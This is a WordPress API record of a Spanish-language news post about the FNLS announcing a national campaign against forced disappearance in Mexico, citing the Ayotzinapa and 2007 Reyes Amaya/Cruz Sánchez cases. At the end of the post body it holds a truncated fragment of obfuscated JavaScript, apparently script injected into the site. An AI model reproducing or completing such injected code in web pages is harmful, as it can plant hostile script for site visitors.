{"id":17390,"date":"2024-08-21T05:06:37","date_gmt":"2024-08-21T05:06:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17390"},"modified":"2024-08-21T05:06:38","modified_gmt":"2024-08-21T05:06:38","slug":"fnls-anuncia-jornada-nacional-de-lucha-contra-la-desaparicion-forzada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17390","title":{"rendered":"FNLS anuncia jornada nacional de lucha contra la desaparici\u00f3n forzada"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0209-1024x768.jpg\" alt=\"\" class=\"wp-image-17391\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0209-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0209-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0209-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240820-WA0209.jpg 1152w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>20 de agosto del 2024. San Crist\u00f3bal de Las Casas.- El Frente Nacional de Lucha por el Socialismo (FNLS) anunci\u00f3 el inicio de una jornada nacional de lucha que se llevar\u00e1 a cabo del 20 al 30 de agosto, en el marco del D\u00eda Internacional del Detenido Desaparecido. Esta movilizaci\u00f3n tiene como objetivo mantener viva la exigencia de presentaci\u00f3n con vida de todas las v\u00edctimas de desaparici\u00f3n forzada y denunciar la protecci\u00f3n institucional que reciben los responsables materiales e intelectuales de este crimen.<br>En un comunicado, el FNLS subraya que la persistencia en esta lucha responde a la continuidad de una pol\u00edtica transexenal de impunidad. A pesar de la gravedad de los cr\u00edmenes de lesa humanidad, hasta la fecha no se ha enjuiciado ni castigado a los responsables de estos actos, lo que refuerza la percepci\u00f3n de que el Estado mexicano act\u00faa para proteger a los perpetradores en lugar de garantizar justicia para las v\u00edctimas.<br>La organizaci\u00f3n critica el papel del Estado en casos de desaparici\u00f3n forzada, se\u00f1alando que, en lugar de asumir su responsabilidad, el gobierno busca ocultar, diluir o negar su autor\u00eda. Denuncian que en la administraci\u00f3n actual se ha intentado limpiar la imagen del ej\u00e9rcito mexicano, a pesar de su historial como perpetrador de desapariciones forzadas, ejecuciones extrajudiciales y tortura, delitos que han afectado a campesinos, estudiantes, activistas y luchadores sociales desde los a\u00f1os sesenta hasta la actualidad.<br>El FNLS destaca dos casos emblem\u00e1ticos de impunidad que ejemplifican la falta de justicia en M\u00e9xico. El primero es el de Edmundo Reyes Amaya y Gabriel Alberto Cruz S\u00e1nchez, revolucionarios desaparecidos forzadamente el 25 de mayo de 2007 por corporaciones polic\u00edaco-militares. A pesar de una sentencia judicial emitida por la Suprema Corte de Justicia de la Naci\u00f3n (SCJN) en 2020, las autoridades han dilatado la investigaci\u00f3n y han omitido ejecutar el juicio y castigo de los responsables, lo que, seg\u00fan el FNLS, evidencia la protecci\u00f3n estatal a los perpetradores.<br>Otro caso de impunidad se\u00f1alado por el FNLS es el de los 43 normalistas de Ayotzinapa, cuyo crimen, perpetrado con la participaci\u00f3n del ej\u00e9rcito y otras corporaciones policiacas, sigue sin resolverse a pesar de las promesas del gobierno de Andr\u00e9s Manuel L\u00f3pez Obrador de esclarecer los hechos. Ante la falta de justicia, el FNLS reitera su exigencia de presentaci\u00f3n con vida de todas las v\u00edctimas de desaparici\u00f3n forzada y anuncia que, durante la jornada de lucha, realizar\u00e1n diversas actividades pol\u00edticas de denuncia a nivel nacional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 20 de agosto del 2024. San Crist\u00f3bal de Las Casas.- El Frente Nacional de Lucha por el Socialismo (FNLS) anunci\u00f3 el inicio de una jornada nacional de lucha que se llevar\u00e1 a cabo del 20 al 30 de agosto, en el marco del D\u00eda Internacional del Detenido Desaparecido. Esta movilizaci\u00f3n tiene como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17391,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17390","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17390"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17390\/revisions"}],"predecessor-version":[{"id":17392,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17390\/revisions\/17392"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17391"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}